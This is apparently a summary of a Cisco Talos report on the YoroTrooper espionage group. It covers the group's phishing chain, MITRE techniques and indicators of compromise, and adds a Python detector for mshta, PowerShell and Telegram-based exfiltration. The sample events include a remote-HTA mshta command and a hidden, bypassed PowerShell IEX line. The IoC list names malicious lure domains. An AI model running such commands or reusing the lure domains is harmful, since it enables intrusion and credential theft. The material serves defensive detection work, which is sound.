Cisco Talos has identified a new espionage actor named YoroTrooper, active since at least June 2022, that targets CIS governments, embassies, an EU health-care agency and WIPO. The group uses Python-based information stealers, commodity RATs (AveMaria/Warzone, LodaRAT, Meterpreter) and a multi-stage infection chain (LNK shortcuts that launch mshta to fetch HTA payloads) to exfiltrate credentials, browser data and documents. #YoroTrooper #StinkStealer #AveMaria #WarzoneRAT #LodaRAT #Meterpreter #WIPO #EUHealthCareAgency #Azerbaijan #CIS
Keypoints
- New threat actor named YoroTrooper identified by Cisco Talos, active since at least June 2022.
- Targets include government and energy entities in CIS countries, plus embassies and at least one EU health-care agency and WIPO.
- Stolen data encompasses credentials, browser histories & cookies, system information, and screenshots.
- Tools span Python-based information stealers (wrapped in executables) and commodity RATs (AveMaria/Warzone, LodaRAT, Meterpreter).
- Infection chain relies on phishing with archives containing LNKs and decoy PDFs; LNKs trigger mshta to fetch HTA payloads.
- Some overlap reported with PoetRAT/Kasablanka but no definitive attribution; LodaRAT variants appear across multiple operators.
MITRE Techniques
- [T1566.001] Phishing – Spearphishing Attachment – Initial access via phishing emails with an attached archive containing a shortcut file and a decoy PDF. ‘The initial attack vectors are phishing emails with a file attached, which usually consists of an archive consisting of two files: a shortcut file and a decoy PDF file.’
- [T1105] Ingress Tool Transfer – LNKs download and execute a remote HTA via mshta.exe. ‘The malicious LNK files are simple downloaders that employ mshta.exe to download and execute a remote HTA file on the infected endpoint.’
- [T1218.005] HTML Application – HTA delivery of payloads – HTA downloads decoy documents and dropper implants. ‘HTA downloads decoy documents and dropper implants.’
- [T1059.001] PowerShell – Command and Scripting Interpreter – Execution of payloads through PowerShell-based commands. ‘All these tasks are accomplished by running PowerShell-based commands.’
- [T1059.006] Python – Python-based malware tooling – Custom Python-based information stealers and RATs, often packed into executables. ‘Custom Python-based information stealers’ and ‘Python-based information stealers… wrapped up into an executable using frameworks such as Nuitka or PyInstaller.’
- [T1027] Obfuscated/Compressed Files – Packaging Python payloads into executables (Nuitka/PyInstaller) that may leak code. ‘wrapped up into an executable using frameworks such as Nuitka or PyInstaller.’
- [T1555.003] Credentials from Web Browsers – Stealers collect browser credentials (Chrome) and other data. ‘stolen data reveals credentials from multiple browsers’ and ‘Chrome browser credentials.’
- [T1071.001] Web Protocols – Telegram-based C2/Exfiltration – Malware uses Telegram bots to exfiltrate data or receive commands. ‘This bot was wrapped up into a .exe either using PyInstaller or Nuitka and then deployed in the field… Telegram bots to exfiltrate information or receive commands from the operator.’
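Added example (not code from the Talos report): a small Python detector that applies three of the techniques listed above to constructed Sysmon-style process-creation and network events: mshta.exe launched with a remote URL, a shell spawned by mshta.exe, and a non-browser process contacting api.telegram.org (the Telegram Bot API host, which the report itself does not name). The key=value event format, PIDs and process names are assumptions; one lure domain from the IoC list is reused in the sample.

```python
import re

# Constructed sample events (not real telemetry) in a Sysmon-like key=value form.
# type=1 is a process-creation event, type=3 is a network-connection event.
SAMPLE_EVENTS = [
    "type=1 pid=4120 ppid=3300 parent=explorer.exe image=mshta.exe cmdline=mshta.exe http://maileecommission.inro.link/x.hta",
    "type=1 pid=4188 ppid=4120 parent=mshta.exe image=powershell.exe cmdline=powershell.exe -w hidden -ep bypass -c IEX(...)",
    "type=1 pid=5010 ppid=3300 parent=explorer.exe image=mshta.exe cmdline=mshta.exe C:\\Vendor\\setup.hta",
    "type=3 pid=6600 image=stealer.exe dst=api.telegram.org dport=443",
    "type=3 pid=6700 image=chrome.exe dst=api.telegram.org dport=443",
]

# Values may contain spaces (command lines), so a value runs until the next " key=" or end of line.
FIELD_RE = re.compile(r"(\w+)=(.*?)(?=\s+\w+=|$)")
REMOTE_RE = re.compile(r"https?://", re.IGNORECASE)
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
BROWSERS = {"chrome.exe", "msedge.exe", "firefox.exe"}  # legitimate Telegram web clients (assumption)
TELEGRAM_API = "api.telegram.org"


def parse(line):
    """Turn one key=value event line into a dict."""
    return dict(FIELD_RE.findall(line))


def detect(events):
    """Return (technique, pid, reason) tuples for events matching the YoroTrooper chain."""
    alerts = []
    for ev in map(parse, events):
        image = ev.get("image", "").lower()
        if ev.get("type") == "1":
            parent = ev.get("parent", "").lower()
            # LNK-style downloader: mshta.exe given a remote HTA URL
            if image == "mshta.exe" and REMOTE_RE.search(ev.get("cmdline", "")):
                alerts.append(("T1218.005", ev["pid"], "mshta.exe fetching remote HTA"))
            # HTA stage running PowerShell-based commands
            if image in SHELLS and parent == "mshta.exe":
                alerts.append(("T1059.001", ev["pid"], f"{image} spawned by mshta.exe"))
        elif ev.get("type") == "3":
            # Telegram bot C2/exfiltration from something that is not a browser
            if ev.get("dst", "").lower() == TELEGRAM_API and image not in BROWSERS:
                alerts.append(("T1071.001", ev["pid"], f"{image} contacting Telegram Bot API"))
    return alerts


if __name__ == "__main__":
    for alert in detect(SAMPLE_EVENTS):
        print(alert)
```

The local-HTA launch (pid 5010) and the browser connection (pid 6700) are deliberately left unflagged to show the two filters that keep this rule from firing on routine activity.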
Indicators of Compromise
- [Domain] Malicious domains masquerading as CIS/government entities – examples from the report's table: mail.mfa.az-link.email, akipress.news, maileecommission.inro.link, sts.mfa.gov.tr.mypolicy.top, industry.tj.mypolicy.top, belaes.by.authentication.becloud.cc, belstat.gov.by.attachment-posts.cc, minsk.gov.by.attachment-posts.cc
- [Domain] Additional masked domain used as a lure – example: mail.[].openingfile.net
- [File] Archive/lure filenames used in campaigns – examples: National_Development_Strategy.rar, Presidents_Strategy_2023.rar, Nota.rar, вложение.rar
- [File] LNK-based dropper/HTA delivery chain components (HTA decoys) – referenced throughout infection chain
Read more: https://blog.talosintelligence.com/yorotrooper-espionage-campaign-cis-turkey-europe/